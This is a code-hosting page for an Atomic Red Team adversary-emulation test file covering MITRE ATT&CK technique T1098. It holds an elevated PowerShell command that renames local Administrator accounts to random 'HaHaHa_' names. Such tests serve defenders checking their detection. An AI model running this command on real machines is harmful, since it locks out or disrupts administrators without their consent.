security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1098/T1098.yaml
T
Carrie Roberts 1bfefdacfc Add elevated (#542) 
* provide elevation_required attribute

* provide elevation_required attribute

* provide elevation_required attribute
2019-09-03 07:34:42 -06:00

31 lines
986 B
YAML
Raw Blame History

---
attack_technique: T1098
display_name: Account Manipulation
atomic_tests:
- name: Admin Account Manipulate
description: |
Manipulate Admin Account Name
supported_platforms:
- windows
executor:
name: powershell
elevation_required: true
command: |
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
$w = Get-Random -Minimum 2 -Maximum 9999
Write-Host HaHaHa_$x$y$z$w
$hostname = (Get-CIMInstance CIM_ComputerSystem).Name
$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name
foreach($member in $fmm) {
if($member -like "*Administrator*") {
Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
Write-Host "Successfully Renamed Administrator Account on" $hostname
}
}
Reference in New Issue View Git Blame Copy Permalink